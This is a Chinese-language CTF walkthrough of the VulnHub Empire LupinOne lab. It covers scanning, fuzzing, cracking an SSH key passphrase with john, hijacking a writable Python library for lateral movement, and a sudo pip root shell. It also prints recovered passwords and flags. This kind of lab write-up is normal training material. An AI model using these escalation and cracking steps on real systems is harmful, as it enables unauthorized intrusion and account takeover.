Empire_Lupin_One

前期准备

源：https://www.vulnhub.com/entry/empire-lupinone,750/

kali：192.168.81.129 255.255.255.0

目标：192.168.81.57

插曲：

？？？？？自己这边热点确保同一网段，但是kali的ipv4老是会不定时消失？？？？

nmap扫描

扫描网段

nmap -sn 192.168.81.0/24 //-sn (仅用于主机发现，不进行端口扫描)

└─# nmap -sn 192.168.81.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-02 11:34 CST
Nmap scan report for localhost (192.168.81.57)
Host is up (0.00016s latency).
MAC Address: 00:0C:29:0C:79:7F (VMware)
Nmap scan report for localhost (192.168.81.152)
Host is up (0.000038s latency).
MAC Address: AC:19:8E:9B:57:53 (Intel Corporate)
Nmap scan report for localhost (192.168.81.161)
Host is up (0.0045s latency).
MAC Address: 72:4D:8C:6A:B9:C8 (Unknown)
Nmap scan report for localhost (192.168.81.129)
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.45 seconds

查看开放端口

mkdir nmapscan  //保存结果
nmap --min-rate 10000 -p- 192.168.81.57 -oA nmapscan/ports

└─# nmap --min-rate 10000 -p- 192.168.81.57 -oA nmapscan/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-02 11:39 CST
Nmap scan report for localhost (192.168.81.57)
Host is up (0.00041s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:0C:79:7F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.72 seconds

进一步排查

TCP:

//-sT 稳定tcp  -sC 默认脚本 -sV 探测服务版本 -O 操作系统
nmap -sT -sC -sV -O -p22,80 192.168.81.57 -oA nmapscan/detail

└─# nmap -sT -sC -sV -O -p22,80 192.168.81.57 -oA nmapscan/detail
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-02 13:02 CST
Nmap scan report for localhost (192.168.81.57)
Host is up (0.00038s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 ed:ea:d9:d3:af:19:9c:8e:4e:0f:31:db:f2:5d:12:79 (RSA)
|   256 bf:9f:a9:93:c5:87:21:a3:6b:6f:9e:e6:87:61:f5:19 (ECDSA)
|_  256 ac:18:ec:cc:35:c0:51:f5:6f:47:74:c3:01:95:b4:0f (ED25519)
80/tcp open  http    Apache httpd 2.4.48 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry 
|_/~myfiles
|_http-server-header: Apache/2.4.48 (Debian)
MAC Address: 00:0C:29:0C:79:7F (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (99%), Linux 5.0 - 5.5 (99%), Linux 3.2 - 4.9 (96%), Linux 2.6.32 - 3.10 (96%), Linux 5.0 - 5.4 (96%), Linux 2.6.32 (96%), Linux 5.4 (95%), Linux 3.1 (95%), Linux 3.2 (95%), Linux 5.3 - 5.4 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.23 seconds

└─# curl http://192.168.81.57/robots.txt
User-agent: *
Disallow: /~myfiles

nmap --script=vuln -p22,80 192.168.81.57 -oA nmapscan/vuln

└─# nmap --script=vuln -p22,80 192.168.81.57 -oA nmapscan/vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-02 13:07 CST
Nmap scan report for localhost (192.168.81.57)
Host is up (0.00019s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|   /robots.txt: Robots file
|   /image/: Potentially interesting directory w/ listing on 'apache/2.4.48 (debian)'
|_  /manual/: Potentially interesting folder
MAC Address: 00:0C:29:0C:79:7F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 30.92 seconds

UDP:

nmap -sU --top-ports 100 192.168.81.57 -oA nmapscan/udp

└─# nmap -sU --top-ports 100 192.168.81.57 -oA nmapscan/udp
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-02 13:09 CST
Nmap scan report for localhost (192.168.81.57)
Host is up (0.00036s latency).
All 100 scanned ports on localhost (192.168.81.57) are in ignored states.
Not shown: 59 closed udp ports (port-unreach), 41 open|filtered udp ports (no-response)
MAC Address: 00:0C:29:0C:79:7F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 59.07 seconds

http:80/ssh:22

curl http://192.168.81.57

└─# curl http://192.168.81.57           
<!DOCTYPE html>
<html>
<head>
<style>
body {
  margin: 0;
}

#over img {
  margin-left: auto;
  margin-right: auto;
  display: block;
}
</style>
</head>

<body>

<div id="over" style="position:absolute; width:100%; height:100%">
  <img src="/image/arsene_lupin.jpg">
</div>

</body>
</html>

<!-- Its an easy box, dont give up. -->

查看之前不允许访问的路径

curl http://192.168.81.57/~myfiles/  

└─# curl http://192.168.81.57/~myfiles/  
<!DOCTYPE html>
<html>
<head>
<title>Error 404</title>
</head>
<body>

<h1>Error 404</h1>

</body>
</html>

<!-- Your can do it, keep trying. -->

爆破目录

dirsearch -u http://192.168.81.57

Target: http://192.168.81.57/

[13:36:50] Starting: 
[13:36:52] 403 -  278B  - /.ht_wsr.txt
[13:36:52] 403 -  278B  - /.htaccess.bak1
[13:36:52] 403 -  278B  - /.htaccess.orig
[13:36:52] 403 -  278B  - /.htaccess.save
[13:36:52] 403 -  278B  - /.htaccess.sample
[13:36:52] 403 -  278B  - /.htaccess_extra
[13:36:52] 403 -  278B  - /.htaccess_orig
[13:36:52] 403 -  278B  - /.htaccess_sc
[13:36:52] 403 -  278B  - /.htaccessBAK
[13:36:52] 403 -  278B  - /.htaccessOLD
[13:36:52] 403 -  278B  - /.htm
[13:36:52] 403 -  278B  - /.html
[13:36:52] 403 -  278B  - /.htaccessOLD2
[13:36:52] 403 -  278B  - /.htpasswds
[13:36:52] 403 -  278B  - /.htpasswd_test
[13:36:52] 403 -  278B  - /.httr-oauth
[13:37:19] 301 -  314B  - /image  ->  http://192.168.81.57/image/
[13:37:21] 301 -  319B  - /javascript  ->  http://192.168.81.57/javascript/
[13:37:24] 301 -  315B  - /manual  ->  http://192.168.81.57/manual/
[13:37:24] 200 -  208B  - /manual/index.html
[13:37:34] 200 -   34B  - /robots.txt
[13:37:35] 403 -  278B  - /server-status
[13:37:35] 403 -  278B  - /server-status/

apache服务器，加上之前disallow 为~开头，扫描特定目录出现secret

工具安利：

ffuf：https://github.com/ffuf/ffuf

trans：translate-shell //apt安装

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.81.57/~FUZZ -t 64

curl -s http://192.168.81.57/~secret/ | trans -b -e bing :zh

// -s 隐藏状态
└─# curl -s http://192.168.81.57/~secret/ | trans -b -e bing :zh
<br>你好，朋友，我很高兴你找到了我的秘密目录。我创建它是为了与你分享我生成的 SSH 私钥文件，</>
<br>它隐藏在这里的某个地方，以防黑客找到并用 FastTrack 破解我的密码。
<br>我很聪明，我知道。
<br>有任何问题请告诉我
<h4>你最好的朋友 icex64</h4>

根据提示找隐藏文件

//.开头
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.81.57/.FUZZ -t 64
//特定文件
//-fs 277 过滤404页面大小
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.81.57/.FUZZ -t 64 -fs 277 -e .key,.txt,.php

~secret/目录下寻找隐藏文件

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.81.57/~secret/.FUZZ -t 64 -fs 277
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.81.57/~secret/.FUZZ -t 64 -fs 277 -e .key,.txt,.php


ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.81.57/~secret/.FUZZ -t 64 -fs 277 -e .key,.txt,.php | grep secret

mysecret.txt            [Status: 200, Size: 4689, Words: 1, Lines: 2, Duration: 5ms]

base解码获取openssh私钥

curl -s http://192.168.81.57/~secret/.mysecret.txt
//无大写O优先58
curl -s http://192.168.81.57/~secret/.mysecret.txt | base58 -d > rsa_key
chmod 600 rsa_key

根据搜集信息尝试ssh连接，rsa密钥格式报错

ssh -i rsa_key icex64@192.168.81.57

└─# ssh -i rsa_key icex64@192.168.81.57
The authenticity of host '192.168.81.57 (192.168.81.57)' can't be established.
ED25519 key fingerprint is SHA256:GZOCytQu/pnSRRTMvJLagwz7ZPlJMDiyabwLvxTrKME.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.81.57' (ED25519) to the list of known hosts.
Load key "rsa_key": error in libcrypto
icex64@192.168.81.57's password: 

检查格式，手动粘贴生成一份

openssl rsa -in rsa_key -check

继续登录，生成hash用join破解密码

破解密码这一块可利用hashcat和join

#└─# ssh -i rsa_key icex64@192.168.81.57 | trans -b -e bing :zh
# Enter passphrase for key 'rsa_key': 
# tee 同时输出
ssh2john rsa_key | tee key_hash

#查看join
# locate *2john
#之前的secret提示 FastTrack
#locate fasttrack

# locate fasttrack.txt

# └─# locate fasttrack.txt
# /usr/share/wordlists/fasttrack.txt

# └─# wc -l /usr/share/wordlists/fasttrack.txt
# 262 /usr/share/wordlists/fasttrack.txt

john key_hash --wordlist=/usr/share/wordlists/fasttrack.txt

└─# john key_hash --wordlist=/usr/share/wordlists/fasttrack.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
P@55w0rd!        (rsa_key)     
1g 0:00:00:02 DONE (2025-11-02 14:48) 0.3861g/s 37.06p/s 37.06c/s 37.06C/s Autumn2013..testing123
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

# ssh -i rsa_key icex64@192.168.81.57
# P@55w0rd!

flag1:

whoami
pwd
cat user.txt

icex64@LupinOne:~$ pwd
/home/icex64
icex64@LupinOne:~$ ls
user.txt

3mp!r3{I_See_That_You_Manage_To_Get_My_Bunny}

提权

查看用户组

ls -hail

# 2359982 drwxr-xr-x  3 arsene arsene 4.0K Oct  4  2021 arsene
# 2360073 drwxr-xr-x  4 icex64 icex64 4.0K Oct  7  2021 icex64

利用点

ls -hail
# 2361164 -rw-r--r-- 1 arsene arsene  118 Oct  4  2021 heist.py
# 2627846 drwxr-xr-x 3 arsene arsene 4.0K Oct  4  2021 .local
# 2360084 -rw-r--r-- 1 arsene arsene  339 Oct  4  2021 note.txt
# 2359984 -rw-r--r-- 1 arsene arsene  807 Oct  4  2021 .profile
# 2361167 -rw------- 1 arsene arsene   67 Oct  4  2021 .secret

cat -n note.txt 

# trans -b -e bing :zh ""
# 嗨，我的朋友 Icex64，你能帮我检查一下我的代码是否安全运行吗？
# 我需要在我的下一次行动中使用它。我不希望其他人进入它，
# 因为这可能会危及我的账户并找到我的秘密文件。
# 只有你可以访问我的程序，因为我知道你的账户是安全的。
# 另一边见。阿尔塞纳·卢平。

cat heist.py

import webbrowser

print ("Its not yet ready to get in action")

webbrowser.open("https://empirecybersecurity.co.mz")

ls -hail /usr/lib/ | grep python

# 2106766 drwxr-xr-x  3 root root 4.0K Oct  4  2021 python2.7
# 2493856 drwxr-xr-x  3 root root 4.0K Oct  4  2021 python3
# 2359582 drwxr-xr-x 31 root root  12K Oct  4  2021 python3.9

ls -hail /usr/lib/python3.9 | grep webbrowser
# 2359824 -rwxrwxrwx  1 root root  24K Oct  4  2021 webbrowser.py

第三方劫持

# !! >覆盖 >>追加 !!
echo 'os.system("/bin/bash")' >> /usr/lib/python3.9/webbrowser.py
# bin not lib
sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py

cat .secret

# arsene@LupinOne:~$ cat .secret 
# I dont like to forget my password "rQ8EE"UK,eV)weg~*nd-`5:{*"j7*Q"

这里留了份py备用，不然echo错了gg，靶机有nano

链接_webbrowser.py

ctrl + o   enter   ctrl +x

ssh登录

sudo ssh arsene@192.168.81.57
# rQ8EE"UK,eV)weg~*nd-`5:{*"j7*Q

sudo -l

# Matching Defaults entries for arsene on LupinOne:
#     env_reset, mail_badpass,
#     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

# User arsene may run the following commands on LupinOne:
#     (root) NOPASSWD: /usr/bin/pip

pip提权

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF

flag2：

whoami
bash
cd /root

root@LupinOne:~# ls -hail
total 36K
131073 drwx------  4 root root 4.0K Oct  7  2021 .
     2 drwxr-xr-x 18 root root 4.0K Oct  4  2021 ..
131076 -rw-------  1 root root  234 Oct  7  2021 .bash_history
131075 -rw-r--r--  1 root root  571 Apr 10  2021 .bashrc
131077 drwxr-xr-x  3 root root 4.0K Oct  4  2021 .local
131074 -rw-r--r--  1 root root  161 Jul  9  2019 .profile
131082 -rw-------  1 root root   12 Oct  4  2021 .python_history
131081 -rw-r--r--  1 root root 3.3K Oct  4  2021 root.txt
131080 drwx------  2 root root 4.0K Oct  4  2021 .ssh

cat root.txt
3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box}

复现源

https://www.bilibili.com/video/BV1LXTrzCEjr/?spm_id_from=333.1391.0.0&vd_source=cd856a7d7a208f3060ffd0f77bb86e38